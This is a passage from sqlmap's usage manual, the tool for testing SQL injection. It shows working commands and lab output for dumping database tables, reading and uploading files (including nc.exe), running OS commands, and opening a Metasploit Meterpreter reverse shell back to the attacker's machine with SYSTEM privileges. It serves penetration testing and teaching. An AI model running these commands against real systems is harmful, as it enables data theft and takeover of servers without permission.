1349
1350Database: owasp10
1351Table: hitlog
1352[6 columns]
1353+----------+----------+
1354| Column | Type |
1355+----------+----------+
1356| date | datetime |
1357| browser | text |
1358| cid | int(11) |
1359| hostname | text |
1360| ip | text |
1361| referer | text |
1362+----------+----------+
1363
1364Database: testdb
1365Table: users
1366[3 columns]
1367+---------+---------------+
1368| Column | Type |
1369+---------+---------------+
1370| id | int(11) |
1371| name | varchar(500) |
1372| surname | varchar(1000) |
1373+---------+---------------+
1374[...]
1375```
1376
1377### Retrieve number of entries for table(s)
1378
1379Switch: `--count`
1380
1381In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch.
1382
1383Example against a Microsoft SQL Server target:
1384
1385```
1386$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
1387 --count -D testdb
1388[...]
1389Database: testdb
1390+----------------+---------+
1391| Table | Entries |
1392+----------------+---------+
1393| dbo.users | 4 |
1394| dbo.users_blob | 2 |
1395+----------------+---------+
1396```
1397
1398### Dump database table entries
1399
1400Switch and options: `--dump`, `-C`, `-T`, `-D`, `--start`, `--stop`, `--first`, `--last`, `--pivot-column` and `--where`
1401
1402When the session user has read access to a specific database's table it is possible to dump the table entries.
1403
1404This functionality depends on option `-T` to specify the table name and optionally on option `-D` to specify the database name. If the table name is provided, but the database name is not, the current database name is used.
1405
1406Example against a Firebird target:
1407
1408```
1409$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
1410 --dump -T users
1411[...]
1412Database: Firebird_masterdb
1413Table: USERS
1414[4 entries]
1415+----+--------+------------+
1416| ID | NAME | SURNAME |
1417+----+--------+------------+
1418| 1 | luther | blisset |
1419| 2 | fluffy | bunny |
1420| 3 | wu | ming |
1421| 4 | NULL | nameisnull |
1422+----+--------+------------+
1423```
1424
1425This switch can also be used to dump all tables' entries of a provided database. You simply have to provide sqlmap with the switch `--dump` along with only the option `-D` (no `-T` and no `-C`).
1426
1427You can also provide a comma-separated list of the specific columns to dump with the option `-C`.
1428
1429sqlmap also generates for each table dumped the entries in a CSV format textual file. You can see the absolute path where sqlmap creates the file by providing a verbosity level greater than or equal to **1**.
1430
1431If you want to dump only a range of entries, then you can provide options `--start` and/or `--stop` to respectively start to dump from a certain entry and stop the dump at a certain entry. For instance, if you want to dump only the first entry, provide `--stop 1` in your command line. Vice versa if, for instance, you want to dump only the second and third entry, provide `--start 1` `--stop 3`.
1432
1433It is also possible to specify which single character or range of characters to dump with options `--first` and `--last`. For instance, if you want to dump columns' entries from the third to the fifth character, provide `--first 3` `--last 5`. This feature only applies to the blind SQL injection techniques because for error-based and UNION query SQL injection techniques the number of requests is exactly the same, regardless of the length of the column's entry output to dump.
1434
1435Sometimes (e.g. for Microsoft SQL Server, Sybase and SAP MaxDB) it is not possible to dump the table rows straightforward by using `OFFSET m, n` mechanism because of lack of similar. In such cases sqlmap dumps the content by determining the most suitable `pivot` column (the one with most unique values) whose values are used later on for retrieval of other column values. If it is necessary to enforce the usage of particular `pivot` column because the automatically chosen one is not suitable (e.g. because of lack of table dump results) you can use option `--pivot-column` (e.g. `--pivot-column=id`).
1436
1437In case that you want to constraint the dump to specific column values (or ranges) you can use option `--where`. Provided logical operation will be automatically used inside the `WHERE` clause. For example, if you use `--where="id>3"` only table rows having value of column `id` greater than 3 will be retrieved (by appending `WHERE id>3` to used dumping queries).
1438
1439As you may have noticed by now, sqlmap is **flexible**: you can leave it to automatically dump the whole database table or you can be very precise in which characters to dump, from which columns and which range of entries.
1440
1441### Dump all databases tables entries
1442
1443Switches: `--dump-all` and `--exclude-sysdbs`
1444
1445It is possible to dump all databases tables entries at once that the session user has read access on.
1446
1447You can also provide the switch `--exclude-sysdbs` to exclude all system databases. In that case sqlmap will only dump entries of users' databases tables.
1448
1449Note that on Microsoft SQL Server the `master` database is not considered a system database because some database administrators use it as a users' database.
1450
1451### Search for columns, tables or databases
1452
1453Switch and options: `--search`, `-C`, `-T`, `-D`
1454
1455This switch allows you to **search for specific database names, specific tables across all databases or specific columns across all databases' tables**.
1456
1457This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like _name_ and _pass_.
1458
1459Switch `--search` needs to be used in conjunction with one of the following support options:
1460
1461* `-C` following a list of comma-separated column names to look for across the whole database management system.
1462* `-T` following a list of comma-separated table names to look for across the whole database management system.
1463* `-D` following a list of comma-separated database names to look for across the database management system.
1464
1465### Run custom SQL statement
1466
1467Option and switch: `--sql-query` and `--sql-shell`
1468
1469The SQL query and the SQL shell features allow to run arbitrary SQL statements on the database management system. sqlmap automatically dissects the provided statement, determines which technique is appropriate to use to inject it and how to pack the SQL payload accordingly.
1470
1471If the query is a `SELECT` statement, sqlmap will retrieve its output. Otherwise it will execute the query through the stacked query SQL injection technique if the web application supports multiple statements on the back-end database management system. Beware that some web application technologies do not support stacked queries on specific database management systems. For instance, PHP does not support stacked queries when the back-end DBMS is MySQL, but it does support when the back-end DBMS is PostgreSQL.
1472
1473Examples against a Microsoft SQL Server 2000 target:
1474
1475```
1476$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
1477sql-query "SELECT 'foo'" -v 1
1478
1479[...]
1480[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
1481[hh:mm:14] [INFO] retrieved: foo
1482SELECT 'foo': 'foo'
1483
1484$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
1485sql-query "SELECT 'foo', 'bar'" -v 2
1486
1487[...]
1488[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
1489[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now
1490unpack it into distinct queries to be able to retrieve the output even if we are
1491 going blind
1492[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS
1493VARCHAR(8000)), (CHAR(32)))
1494[hh:mm:50] [INFO] retrieved: foo
1495[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
1496[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
1497RCHAR(8000)), (CHAR(32)))
1498[hh:mm:50] [INFO] retrieved: bar
1499[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
1500SELECT 'foo', 'bar': 'foo, bar'
1501```
1502
1503As you can see, sqlmap splits the provided query into two different `SELECT` statements then retrieves the output for each separate query.
1504
1505If the provided query is a `SELECT` statement and contains a `FROM` clause, sqlmap will ask you if such statement can return multiple entries. In that case the tool knows how to unpack the query correctly to count the number of possible entries and retrieve its output, entry per entry.
1506
1507The SQL shell option allows you to run your own SQL statement interactively, like a SQL console connected to the database management system. This feature provides TAB completion and history support too.
1508
1509## Brute force
1510
1511These switches can be used to run brute force checks.
1512
1513### Brute force tables names
1514
1515Switch: `--common-tables`
1516
1517There are cases where switch `--tables` can not be used to retrieve the databases' table names. These cases usually fit into one of the following categories:
1518
1519* The database management system is MySQL **< 5.0** where `information_schema` is not available.
1520* The database management system is Microsoft Access and system table `MSysObjects` is not readable - default setting.
1521* The session user does not have read privileges against the system table storing the scheme of the databases.
1522
1523If any of the first two cases apply and you provided the switch `--tables`, sqlmap will prompt you with a question
1524to fall back to this technique. Either of these cases apply to your situation, sqlmap can possibly still identify some existing tables if you provide it with the switch `--common-tables`. sqlmap will perform a brute-force attack in order to detect the existence of common tables across the DBMS.
1525
1526The list of common table names is `txt/common-tables.txt` and you can edit it as you wish.
1527
1528Example against a MySQL 4.1 target:
1529
1530```
1531$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
1532n-tables -D testdb --banner
1533
1534[...]
1535[hh:mm:39] [INFO] testing MySQL
1536[hh:mm:39] [INFO] confirming MySQL
1537[hh:mm:40] [INFO] the back-end DBMS is MySQL
1538[hh:mm:40] [INFO] fetching banner
1539web server operating system: Windows
1540web application technology: PHP 5.3.1, Apache 2.2.14
1541back-end DBMS operating system: Windows
1542back-end DBMS: MySQL < 5.0.0
1543banner: '4.1.21-community-nt'
1544
1545[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
1546t/common-tables.txt'
1547[hh:mm:40] [INFO] adding words used on web page to the check list
1548please enter number of threads? [Enter for 1 (current)] 8
1549[hh:mm:43] [INFO] retrieved: users
1550
1551Database: testdb
1552[1 table]
1553+-------+
1554| users |
1555+-------+
1556```
1557
1558### Brute force columns names
1559
1560Switch: `--common-columns`
1561
1562As per tables, there are cases where switch `--columns` can not be used to retrieve the databases' tables' column names. These cases usually fit into one of the following categories:
1563
1564* The database management system is MySQL **< 5.0** where `information_schema` is not available.
1565* The database management system is Microsoft Access where this kind of information is not available inside system tables.
1566* The session user does not have read privileges against the system table storing the scheme of the databases.
1567
1568If any of the first two cases apply and you provided the switch `--columns`, sqlmap will prompt you with a question
1569to fall back to this technique. Either of these cases apply to your situation, sqlmap can possibly still identify some existing tables if you provide it with the switch `--common-columns`. sqlmap will perform a brute-force attack in order to detect the existence of common columns across the DBMS.
1570
1571The list of common table names is `txt/common-columns.txt` and you can edit it as you wish.
1572
1573## User-defined function injection
1574
1575These options can be used to create custom user-defined functions.
1576
1577### Inject custom user-defined functions (UDF)
1578
1579Switch and option: `--udf-inject` and `--shared-lib`
1580
1581You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library, DLL for Windows and shared object for Linux/Unix, then provide sqlmap with the path where the shared library is stored locally on your machine. sqlmap will then ask you some questions, upload the shared library on the database server file system, create the user-defined function(s) from it and, depending on your options, execute them. When you are finished using the injected UDFs, sqlmap can also remove them from the database for you.
1582
1583These techniques are detailed in the white paper [Advanced SQL injection to operating system full control](http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857).
1584
1585Use option `--udf-inject` and follow the instructions.
1586
1587If you want, you can specify the shared library local file system path via command line too by using `--shared-lib` option. Vice versa sqlmap will ask you for the path at runtime.
1588
1589This feature is available only when the database management system is MySQL or PostgreSQL.
1590
1591## File system access
1592
1593### Read a file from the database server's file system
1594
1595Option: `--file-read`
1596
1597It is possible to retrieve the content of files from the underlying file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.
1598
1599These techniques are detailed in the white paper [Advanced SQL injection to operating system full control](http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857).
1600
1601Example against a Microsoft SQL Server 2005 target to retrieve a binary file:
1602
1603```
1604$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam\
1605e=luther" --file-read "C:/example.exe" -v 1
1606
1607[...]
1608[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
1609web server operating system: Windows 2000
1610web application technology: ASP.NET, Microsoft IIS 6.0, ASP
1611back-end DBMS: Microsoft SQL Server 2005
1612
1613[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
1614[hh:mm:50] [INFO] the SQL query provided returns 3 entries
1615C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/
1616C__example.exe'
1617[...]
1618
1619$ ls -l output/192.168.136.129/files/C__example.exe
1620-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
1621_example.exe
1622
1623$ file output/192.168.136.129/files/C__example.exe
1624output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
1625) Intel 80386 32-bit
1626```
1627
1628### Upload a file to the database server's file system
1629
1630Options: `--file-write` and `--file-dest`
1631
1632It is possible to upload a local file to the database server's file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.
1633
1634These techniques are detailed in the white paper [Advanced SQL injection to operating system full control](http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857).
1635
1636Example against a MySQL target to upload a binary UPX-compressed file:
1637
1638```
1639$ file /software/nc.exe.packed
1640/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
1641-bit
1642
1643$ ls -l /software/nc.exe.packed
1644-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
1645
1646$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
1647-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
1648
1649[...]
1650[hh:mm:29] [INFO] the back-end DBMS is MySQL
1651web server operating system: Windows 2003 or 2008
1652web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
1653back-end DBMS: MySQL >= 5.0.0
1654
1655[...]
1656do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
1657fully written on the back-end DBMS file system? [Y/n] y
1658[hh:mm:52] [INFO] retrieved: 31744
1659[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
1660ytes, same size as the local file '/software/nc.exe.packed'
1661```
1662
1663## Operating system takeover
1664
1665### Run arbitrary operating system command
1666
1667Option and switch: `--os-cmd` and `--os-shell`
1668
1669It is possible to **run arbitrary commands on the database server's underlying operating system** when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.
1670
1671On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, `sys_exec()` and `sys_eval()`, then it creates these two functions on the database and calls one of them to execute the specified command, depending on user's choice to display the standard output or not. On Microsoft SQL Server, sqlmap abuses the `xp_cmdshell` stored procedure: if it is disabled (by default on Microsoft SQL Server >= 2005), sqlmap re-enables it; if it does not exist, sqlmap creates it from scratch.
1672
1673When the user requests the standard output, sqlmap uses one of the enumeration SQL injection techniques (blind, inband or error-based) to retrieve it. Vice versa, if the standard output is not required, stacked query SQL injection technique is used to execute the command.
1674
1675These techniques are detailed in the white paper [Advanced SQL injection to operating system full control](http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857).
1676
1677Example against a PostgreSQL target:
1678
1679```
1680$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
1681os-cmd id -v 1
1682
1683[...]
1684web application technology: PHP 5.2.6, Apache 2.2.9
1685back-end DBMS: PostgreSQL
1686[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
1687[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
1688[hh:mm:12] [INFO] testing if current user is DBA
1689[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
1690[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
1691[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
1692[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
1693[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
1694do you want to retrieve the command standard output? [Y/n/a] y
1695command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(post
1696gres)'
1697
1698[hh:mm:19] [INFO] cleaning up the database management system
1699do you want to remove UDF 'sys_eval'? [Y/n] y
1700do you want to remove UDF 'sys_exec'? [Y/n] y
1701[hh:mm:23] [INFO] database management system cleanup finished
1702[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
1703tem can only be deleted manually
1704```
1705
1706It is also possible to simulate a real shell where you can type as many arbitrary commands as you wish. The option is `--os-shell` and has the same TAB completion and history functionalities that `--sql-shell` has.
1707
1708Where stacked queries has not been identified on the web application (e.g. PHP or ASP with back-end database management system being MySQL) and the DBMS is MySQL, it is still possible to abuse the `SELECT` clause's `INTO OUTFILE` to create a web backdoor in a writable folder within the web server document root and still get command execution assuming the back-end DBMS and the web server are hosted on the same server. sqlmap supports this technique and allows the user to provide a comma-separated list of possible document root sub-folders where try to upload the web file stager and the subsequent web backdoor. Also, sqlmap has its own tested web file stagers and backdoors for the following languages:
1709
1710* ASP
1711* ASP.NET
1712* JSP
1713* PHP
1714
1715### Out-of-band stateful connection: Meterpreter & friends
1716
1717Switches and options: `--os-pwn`, `--os-smbrelay`, `--os-bof`, `--priv-esc`, `--msf-path` and `--tmp-path`
1718
1719It is possible to establish an **out-of-band stateful TCP connection between the attacker machine and the database server** underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
1720
1721sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are:
1722
1723* Database **in-memory execution of the Metasploit's shellcode** via sqlmap own user-defined function `sys_bineval()`. Supported on MySQL and PostgreSQL - switch `--os-pwn`.
1724* Upload and execution of a Metasploit's **stand-alone payload stager** via sqlmap own user-defined function `sys_exec()` on MySQL and PostgreSQL or via `xp_cmdshell()` on Microsoft SQL Server - switch `--os-pwn`.
1725* Execution of Metasploit's shellcode by performing a **SMB reflection attack** ([MS08-068](http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx)) with a UNC path request from the database server to
1726the attacker's machine where the Metasploit `smb_relay` server exploit listens. Supported when running sqlmap with high privileges (`uid=0`) on Linux/Unix and the target DBMS runs as Administrator on Windows - switch `--os-smbrelay`.
1727* Database in-memory execution of the Metasploit's shellcode by exploiting **Microsoft SQL Server 2000 and 2005
1728`sp_replwritetovarbin` stored procedure heap-based buffer overflow** ([MS09-004](http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx)). sqlmap has its own exploit to trigger the
1729vulnerability with automatic DEP memory protection bypass, but it relies on Metasploit to generate the shellcode to get executed upon successful exploitation - switch `--os-bof`.
1730
1731These techniques are detailed in the white paper [Advanced SQL injection to operating system full control](http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857) and in the
1732slide deck [Expanding the control over the operating system from the database](http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database).
1733
1734Example against a MySQL target:
1735
1736```
1737$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\
1738id=1" --os-pwn --msf-path /software/metasploit
1739
1740[...]
1741[hh:mm:31] [INFO] the back-end DBMS is MySQL
1742web server operating system: Windows 2003
1743web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
1744back-end DBMS: MySQL 5.0
1745[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
1746[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
1747how do you want to establish the tunnel?
1748[1] TCP: Metasploit Framework (default)
1749[2] ICMP: icmpsh - ICMP tunneling
1750>
1751[hh:mm:32] [INFO] testing if current user is DBA
1752[hh:mm:32] [INFO] fetching current user
1753what is the back-end database management system architecture?
1754[1] 32-bit (default)
1755[2] 64-bit
1756>
1757[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
1758[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
1759[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
1760[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
1761[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
1762[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
1763how do you want to execute the Metasploit shellcode on the back-end database und
1764erlying operating system?
1765[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
1766[2] Stand-alone payload stager (file system way)
1767>
1768[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
1769which connection type do you want to use?
1770[1] Reverse TCP: Connect back from the database host to this machine (default)
1771[2] Reverse TCP: Try to connect back from the database host to this machine, on
1772all ports
1773between the specified and 65535
1774[3] Bind TCP: Listen on the database host for a connection
1775>
1776which is the local address? [192.168.136.1]
1777which local port number do you want to use? [60641]
1778which payload do you want to use?
1779[1] Meterpreter (default)
1780[2] Shell
1781[3] VNC
1782>
1783[hh:mm:40] [INFO] creation in progress ... done
1784[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
1785lease wait..
1786
1787 _
1788 | | o
1789_ _ _ _ _|_ __, , _ | | __ _|_
1790/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
1791| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
1792 /|
1793 \|
1794
1795
1796 =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
1797+ -- --=[ 674 exploits - 351 auxiliary
1798+ -- --=[ 217 payloads - 27 encoders - 8 nops
1799 =[ svn r12272 updated 4 days ago (2011.04.07)
1800
1801PAYLOAD => windows/meterpreter/reverse_tcp
1802EXITFUNC => thread
1803LPORT => 60641
1804LHOST => 192.168.136.1
1805[*] Started reverse handler on 192.168.136.1:60641
1806[*] Starting the payload handler...
1807[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
1808ineval', please wait..
1809[*] Sending stage (749056 bytes) to 192.168.136.129
1810[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
1811t Mon Apr 11 hh:mm:52 +0100 2011
1812
1813meterpreter > Loading extension espia...success.
1814meterpreter > Loading extension incognito...success.
1815meterpreter > [-] The 'priv' extension has already been loaded.
1816meterpreter > Loading extension sniffer...success.
1817meterpreter > System Language : en_US
1818OS : Windows .NET Server (Build 3790, Service Pack 2).
1819Computer : W2K3R2
1820Architecture : x86
1821Meterpreter : x86/win32
1822meterpreter > Server username: NT AUTHORITY\SYSTEM
1823meterpreter > ipconfig
1824
1825MS TCP Loopback interface
1826Hardware MAC: 00:00:00:00:00:00
1827IP Address : 127.0.0.1
1828Netmask : 255.0.0.0
1829
1830
1831
1832Intel(R) PRO/1000 MT Network Connection
1833Hardware MAC: 00:0c:29:fc:79:39
1834IP Address : 192.168.136.129
1835Netmask : 255.255.255.0
1836
1837
1838meterpreter > exit
1839
1840[*] Meterpreter session 1 closed. Reason: User exit
1841```
1842
1843By default MySQL on Windows runs as `SYSTEM`, however PostgreSQL runs as a low-privileged user `postgres` on both Windows and Linux. Microsoft SQL Server 2000 by default runs as `SYSTEM`, whereas Microsoft SQL Server 2005 and 2008 run most of the times as `NETWORK SERVICE` and sometimes as `LOCAL SERVICE`.
1844
1845It is possible to provide sqlmap with switch `--priv-esc` to perform a **database process' user privilege escalation** via Metasploit's `getsystem` command which include, among others, the [kitrap0d](http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html) technique ([MS10-015](http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx)).
1846
1847## Windows registry access
1848
1849It is possible to access Windows registry when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and when the web application supports stacked queries. Also, session user has to have the needed privileges to access it.
1850
1851### Read a Windows registry key value
1852
1853Switch: `--reg-read`
1854
1855Using this switch you can read registry key values.
1856
1857### Write a Windows registry key value
1858
1859Switch: `--reg-add`
1860
1861Using this switch you can write registry key values.
1862
1863### Delete a Windows registry key
1864
1865Switch: `--reg-del`
1866
1867Using this switch you can delete registry keys.
1868
1869### Auxiliary registry options
1870
1871Options: `--reg-key`, `--reg-value`, `--reg-data` and `--reg-type`
1872
1873These options can be used to provide data needed for proper running of switches `--reg-read`, `--reg-add` and `--reg-del`. So, instead of providing registry key information when asked, you can use them at command prompt as program arguments.
1874
1875With `--reg-key` option you specify used Windows registry key path, with `--reg-value` value item name inside provided key, with `--reg-data` value data, while with `--reg-type` option you specify type of the value item.
1876
1877A sample command line for adding a registry key hive follows:
1878
1879```
1880$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r\
1881eg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-ty\
1882pe=REG_SZ --reg-data=1
1883```
1884
1885## General
1886
1887These options can be used to set some general working parameters.
1888
1889### Load session from a stored (.sqlite) file
1890
1891Option: `-s`
1892
1893sqlmap automatically creates a persistent session SQLite file for each target, inside dedicated output directory, where it stores all data required for session resumal. If user wants to explicitly set the session file location (e.g. for storing of session data for multiple targets at one place) he can use this option.
1894
1895### Log HTTP(s) traffic to a textual file
1896
1897Option: `-t`
1898
1899This option requires an argument that specified the textual file to write all HTTP(s) traffic generated by sqlmap - HTTP(S) requests and HTTP(S) responses.
1900
1901This is useful primarily for debug purposes - when you provide the developers with a potential bug report, send this file too.
1902
1903### Set answers for questions
1904
1905Option: `--answers`
1906
1907In case that user wants to automatically set up answers for questions, even if `--batch` is used, using this option he can do it by providing any part of question together with answer after an equal sign. Also, answers for different question can be split with delimiter character `,`.
1908
1909Example against a MySQL target:
1910
1911```
1912$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--te\
1913chnique=E --answers="extending=N" --batch
1914[...]
1915[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
1916heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
1917want to skip test payloads specific for other DBMSes? [Y/n] Y
1918[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
1919d level (1) and risk (1)? [Y/n] N
1920[...]
1921```
1922
1923### Declare parameters containing Base64 encoded data
1924
1925Option: `--base64`
1926
1927In case that the target web application is using Base64 encoding to store data inside specific parameters (e.g. Base64 encoded JSON dictionary), user can declare it with option `--base64` and thus instruct sqlmap to properly test the underlying values.
1928
1929Example usage (Note: `Base64('{"id": 1}') == 'eyJpZCI6IDF9'`):
1930
1931```
1932$ python sqlmap.py -u http://192.168.22.128/sqlmap/mysql/get_base64?value=eyJpZC\
1933I6IDF9 -v 5 --base64=value
1934[...]
1935[23:43:35] [INFO] testing 'Boolean-based blind - Parameter replace (original valu
1936e)'
1937[23:43:35] [PAYLOAD] KFNFTEVDVCAoQ0FTRSBXSEVOICgzODY1PTUzMTQpIFRIRU4gJ3siaWQiOiAx
1938fScgRUxTRSAoU0VMRUNUIDUzMTQgVU5JT04gU0VMRUNUIDE5MzIpIEVORCkp
1939[23:43:35] [TRAFFIC OUT] HTTP request [#11]:
1940GET /?value=KFNFTEVDVCAoQ0FTRSBXSEVOICgzODY1PTUzMTQpIFRIRU4gJ3siaWQiOiAxfScgRUxTR
1941SAoU0VMRUNUIDUzMTQgVU5JT04gU0VMRUNUIDE5MzIpIEVORCkp HTTP/1.1
1942Host: localhost
1943Cache-control: no-cache
1944Accept-encoding: gzip,deflate
1945Accept: */*
1946User-agent: sqlmap/1.4.4.3#dev (http://sqlmap.org)
1947Connection: close
1948[...]
1949```
1950
1951### Act in non-interactive mode
1952
1953Switch: `--batch`
1954
1955If you want sqlmap to run as a batch tool, without any user's interaction when sqlmap requires it, you can force that by using switch `--batch`. This will leave sqlmap to go with a default behaviour whenever user's input would be required.
1956
1957### Binary content retrieval
1958
1959Option `--binary-fields`
1960
1961In case of binary content retrieval, like in example of tables having column(s) with stored binary values (e.g. column `password` with binary stored password hash values), it is possible to use option `--binary-fields` for (extra) proper handling by sqlmap. All those fields (i.e. table columns) are then retrieved and represented in their hexadecimal representation, so afterwards they could be properly processed with other tools (e.g. `john`).
1962
1963### Custom (blind) SQL injection charset
1964
1965Option: `--charset`
1966
1967During boolean-based blind and time-based blind SQL injection cases, user can force the usage of custom charset to speed-up the data retrieval process. For example, in case of dumping message digest values (e.g. SHA1), by using (e.g.) `--charset="0123456789abcdef"` expected number of requests is around 30% less than in regular run.
1968
1969### Crawl the website starting from the target URL
1970
1971Option: `--crawl`
1972
1973sqlmap can collect potentially vulnerable links by collecting them (crawling) starting from the target location. Using this option user can set a depth (distance from a starting location) below which sqlmap won't go in collecting phase, as the process is being done recursively as long as there are new links to be visited.
1974
1975Example run against a MySQL target:
1976
1977```
1978$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
1979[...]
1980[xx:xx:53] [INFO] starting crawler
1981[xx:xx:53] [INFO] searching for links with depth 1
1982[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
1983[xx:xx:53] [INFO] searching for links with depth 2
1984[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
1985[xx:xx:00] [INFO] 42/56 links visited (75%)
1986[...]
1987```
1988
1989Option `--crawl-exclude`
1990
1991With this option you can exclude pages from crawling by providing a regular expression. For example, if you want to skip all pages that have the keyword `logout` in their paths, you can use `--crawl-exclude=logout`.
1992
1993### Delimiting character used in CSV output
1994
1995Option: `--csv-del`
1996
1997When data being dumped is stored into the CSV format (`--dump-format=CSV`), entries have to be separated with a "separation value" (default is `,`). In case that user wants to override its default value he can use this option (e.g. `--csv-del=";"`).
1998
1999### DBMS authentication credentials
2000
2001Option: `--dbms-cred`
2002
2003In some cases user will be warned that some operations failed because of lack of current DBMS user privileges and that he could try to use this option. In those cases, if he provides `admin` user credentials to sqlmap by using this option, sqlmap will try to rerun the problematic part with specialized "run as" mechanisms (e.g. `OPENROWSET` on Microsoft SQL Server) using those credentials.
2004
2005### Format of dumped data
2006
2007Option: `--dump-format`
2008
2009sqlmap supports three different types of formatting when storing dumped table data into the corresponding file inside an output directory: `CSV`, `HTML` and `SQLITE`. Default one is `CSV`, where each table row is stored into a textual file line by line, and where each entry is separated with a comma character `,` (or one provided with option `--csv-del`). In case of `HTML`, output is being stored into a HTML file, where each row is represented with a row inside a formatted table. In case of `SQLITE`, output is being stored into a SQLITE database, where original table content is replicated into the corresponding table having a same name.
2010
2011### Force character encoding used for data retrieval
2012
2013Option: `--encoding`
2014
